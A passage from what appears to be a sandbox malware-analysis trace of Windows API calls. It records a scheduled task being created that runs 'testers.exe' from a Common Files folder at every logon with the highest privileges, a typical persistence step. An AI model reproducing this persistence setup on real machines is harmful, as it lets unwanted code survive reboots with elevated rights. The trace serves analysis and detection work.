(_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] lstrlenW (lpString="tr") returned 2 [0074.085] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.085] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.085] lstrlenW (lpString="|sc|") returned 4 [0074.085] lstrlenW (lpString="|tr|") returned 4 [0074.085] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0074.085] SetLastError (dwErrCode=0x490) [0074.085] lstrlenW (lpString="mo") returned 2 [0074.085] lstrlenW (lpString="mo") returned 2 [0074.085] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] lstrlenW (lpString="tr") returned 2 [0074.085] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|mo|") returned 4 [0074.085] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.085] lstrlenW (lpString="|mo|") returned 4 [0074.085] lstrlenW (lpString="|tr|") returned 4 [0074.085] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0074.085] SetLastError (dwErrCode=0x490) [0074.085] lstrlenW (lpString="d") returned 1 [0074.085] lstrlenW (lpString="d") returned 1 [0074.085] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] lstrlenW (lpString="tr") returned 2 [0074.086] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|d|") returned 3 [0074.086] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.086] lstrlenW (lpString="|d|") returned 3 [0074.086] lstrlenW (lpString="|tr|") returned 4 [0074.086] SetLastError (dwErrCode=0x490) [0074.086] lstrlenW (lpString="m") returned 1 [0074.086] lstrlenW (lpString="m") returned 1 [0074.086] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] lstrlenW (lpString="tr") returned 2 [0074.086] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|m|") returned 3 [0074.086] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.086] lstrlenW (lpString="|m|") returned 3 [0074.086] lstrlenW (lpString="|tr|") returned 4 [0074.086] SetLastError (dwErrCode=0x490) [0074.086] lstrlenW (lpString="i") returned 1 [0074.086] lstrlenW (lpString="i") returned 1 [0074.086] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] lstrlenW (lpString="tr") returned 2 [0074.086] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|i|") returned 3 [0074.086] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.086] lstrlenW (lpString="|i|") returned 3 [0074.086] lstrlenW (lpString="|tr|") returned 4 [0074.086] SetLastError (dwErrCode=0x490) [0074.086] lstrlenW (lpString="tn") returned 2 [0074.086] lstrlenW (lpString="tn") returned 2 [0074.086] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.086] lstrlenW (lpString="tr") returned 2 [0074.087] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.087] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.087] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.087] lstrlenW (lpString="|tn|") returned 4 [0074.087] lstrlenW (lpString="|tr|") returned 4 [0074.087] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0074.087] SetLastError (dwErrCode=0x490) [0074.087] lstrlenW (lpString="tr") returned 2 [0074.087] lstrlenW (lpString="tr") returned 2 [0074.087] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.087] lstrlenW (lpString="tr") returned 2 [0074.087] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.087] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.087] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.087] lstrlenW (lpString="|tr|") returned 4 [0074.087] lstrlenW (lpString="|tr|") returned 4 [0074.087] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0074.087] SetLastError (dwErrCode=0x0) [0074.087] SetLastError (dwErrCode=0x0) [0074.087] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.087] lstrlenW (lpString="-/") returned 2 [0074.087] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0074.087] SetLastError (dwErrCode=0x490) [0074.087] SetLastError (dwErrCode=0x490) [0074.087] SetLastError (dwErrCode=0x0) [0074.087] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.087] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\testers.exe" [0074.087] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.087] _memicmp (_Buf1=0x2d4db0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.087] _memicmp (_Buf1=0x2d4de0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.087] SetLastError (dwErrCode=0x7a) [0074.087] SetLastError (dwErrCode=0x0) [0074.087] SetLastError (dwErrCode=0x0) [0074.087] lstrlenW (lpString="C") returned 1 [0074.088] SetLastError (dwErrCode=0x490) [0074.088] SetLastError (dwErrCode=0x0) [0074.088] _memicmp (_Buf1=0x2d4d98, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.088] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.088] GetProcessHeap () returned 0x2c0000 [0074.088] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d68) returned 1 [0074.088] GetProcessHeap () returned 0x2c0000 [0074.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0xc, Ptr=0x2d4d68, Size=0x42) returned 0x2d6a68 [0074.088] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.088] lstrlenW (lpString=" \x09") returned 2 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0074.088] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0074.089] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0074.089] GetLastError () returned 0x0 [0074.089] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.089] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.089] SetLastError (dwErrCode=0x0) [0074.089] GetProcessHeap () returned 0x2c0000 [0074.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5478 [0074.089] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.089] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0074.089] lstrlenW (lpString="LIMITED") returned 7 [0074.089] GetProcessHeap () returned 0x2c0000 [0074.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d68 [0074.089] GetThreadLocale () returned 0x409 [0074.089] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0074.089] GetProcessHeap () returned 0x2c0000 [0074.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5458 [0074.089] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.089] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0074.089] lstrlenW (lpString="HIGHEST") returned 7 [0074.089] GetProcessHeap () returned 0x2c0000 [0074.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4df8 [0074.089] GetThreadLocale () returned 0x409 [0074.089] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5438 [0074.090] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.090] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0074.090] lstrlenW (lpString="MINUTE") returned 6 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xe) returned 0x2d4e10 [0074.090] GetThreadLocale () returned 0x409 [0074.090] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5418 [0074.090] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.090] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0074.090] lstrlenW (lpString="HOURLY") returned 6 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xe) returned 0x2d4e28 [0074.090] GetThreadLocale () returned 0x409 [0074.090] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d53f8 [0074.090] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.090] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0074.090] lstrlenW (lpString="DAILY") returned 5 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xc) returned 0x2d4e40 [0074.090] GetThreadLocale () returned 0x409 [0074.090] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0074.090] GetProcessHeap () returned 0x2c0000 [0074.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d53b8 [0074.090] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.091] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0074.091] lstrlenW (lpString="WEEKLY") returned 6 [0074.091] GetProcessHeap () returned 0x2c0000 [0074.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xe) returned 0x2d4e58 [0074.091] GetThreadLocale () returned 0x409 [0074.091] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0074.091] GetProcessHeap () returned 0x2c0000 [0074.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d54f8 [0074.091] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.091] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0074.091] lstrlenW (lpString="MONTHLY") returned 7 [0074.091] GetProcessHeap () returned 0x2c0000 [0074.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4e70 [0074.091] GetThreadLocale () returned 0x409 [0074.091] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0074.091] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.091] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0074.091] lstrlenW (lpString="ONCE") returned 4 [0074.091] GetProcessHeap () returned 0x2c0000 [0074.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xa) returned 0x2d4e88 [0074.091] GetThreadLocale () returned 0x409 [0074.091] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0074.091] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.091] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0074.091] lstrlenW (lpString="ONSTART") returned 7 [0074.091] GetThreadLocale () returned 0x409 [0074.091] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0074.091] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.091] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0074.091] lstrlenW (lpString="ONLOGON") returned 7 [0074.091] GetThreadLocale () returned 0x409 [0074.091] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0074.092] SetLastError (dwErrCode=0x0) [0074.092] GetProcessHeap () returned 0x2c0000 [0074.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x1fc) returned 0x2d6ab8 [0074.092] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.092] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0074.092] lstrlenW (lpString="First") returned 5 [0074.092] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.092] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0074.092] lstrlenW (lpString="Second") returned 6 [0074.092] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.092] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0074.092] lstrlenW (lpString="Third") returned 5 [0074.092] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.092] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0074.092] lstrlenW (lpString="Fourth") returned 6 [0074.092] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.092] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0074.092] lstrlenW (lpString="Last") returned 4 [0074.137] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.137] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0074.137] lstrlenW (lpString="First") returned 5 [0074.137] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.137] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0074.137] lstrlenW (lpString="Second") returned 6 [0074.137] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.137] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0074.138] lstrlenW (lpString="Third") returned 5 [0074.138] GetProcessHeap () returned 0x2c0000 [0074.138] GetProcessHeap () returned 0x2c0000 [0074.138] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e88) returned 1 [0074.138] GetProcessHeap () returned 0x2c0000 [0074.138] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e88) returned 0xa [0074.138] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.138] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0074.138] lstrlenW (lpString="Fourth") returned 6 [0074.138] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.138] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0074.138] lstrlenW (lpString="Last") returned 4 [0074.138] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xbc838, cchData=128 | out: lpLCData="0") returned 2 [0074.139] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.139] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0074.139] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d68) returned 1 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d68) returned 0x10 [0074.139] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xbc840, cchData=128 | out: lpLCData="0") returned 2 [0074.139] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.139] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0074.139] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4df8) returned 1 [0074.139] GetProcessHeap () returned 0x2c0000 [0074.139] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4df8) returned 0x10 [0074.139] GetLocalTime (in: lpSystemTime=0xbc9f0 | out: lpSystemTime=0xbc9f0*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x18, wSecond=0x28, wMilliseconds=0x207)) [0074.139] GetLocalTime (in: lpSystemTime=0xbce0c | out: lpSystemTime=0xbce0c*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x18, wSecond=0x28, wMilliseconds=0x207)) [0074.139] lstrlenW (lpString="") returned 0 [0074.139] lstrlenW (lpString="") returned 0 [0074.140] lstrlenW (lpString="") returned 0 [0074.140] lstrlenW (lpString="") returned 0 [0074.140] lstrlenW (lpString="") returned 0 [0074.140] lstrlenW (lpString="") returned 0 [0074.140] lstrlenW (lpString="") returned 0 [0074.140] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0074.170] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0074.224] CoCreateInstance (in: rclsid=0x5230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x520fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xbcdc4 | out: ppv=0xbcdc4*=0x4d3df0) returned 0x0 [0074.462] TaskScheduler:ITaskService:Connect (This=0x4d3df0, serverName=0xbcd34*(varType=0x8, wReserved1=0x2e53, wReserved2=0xcdc8, wReserved3=0xb, varVal1=0x0, varVal2=0xbcdac), user=0xbcd44*(varType=0x0, wReserved1=0x76c1, wReserved2=0x8564, wReserved3=0x4d3c, varVal1=0xbe8a0, varVal2=0xbdcb0), domain=0xbcd54*(varType=0x0, wReserved1=0x4ffe, wReserved2=0xdc78, wReserved3=0xb, varVal1=0x5994e, varVal2=0xbf29c), password=0xbcd64*(varType=0x0, wReserved1=0x77ca, wReserved2=0x3c, wReserved3=0x0, varVal1=0x2e53f000, varVal2=0xffffffac)) returned 0x0 [0074.473] TaskScheduler:IUnknown:AddRef (This=0x4d3df0) returned 0x2 [0074.473] TaskScheduler:ITaskService:GetFolder (in: This=0x4d3df0, Path=0x0, ppFolder=0xbce68 | out: ppFolder=0xbce68*=0x4d3e58) returned 0x0 [0074.475] TaskScheduler:ITaskService:NewTask (in: This=0x4d3df0, flags=0x0, ppDefinition=0xbce78 | out: ppDefinition=0xbce78*=0x4d3e98) returned 0x0 [0074.478] ITaskDefinition:get_Actions (in: This=0x4d3e98, ppActions=0xbcdc4 | out: ppActions=0xbcdc4*=0x4d3f10) returned 0x0 [0074.479] IActionCollection:Create (in: This=0x4d3f10, Type=0, ppAction=0xbcddc | out: ppAction=0xbcddc*=0x4d2678) returned 0x0 [0074.480] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.480] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.480] lstrlenW (lpString=" ") returned 1 [0074.480] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x32) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0074.480] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0074.481] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0074.481] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0074.481] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.481] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x20) returned 0x0 [0074.481] SetLastError 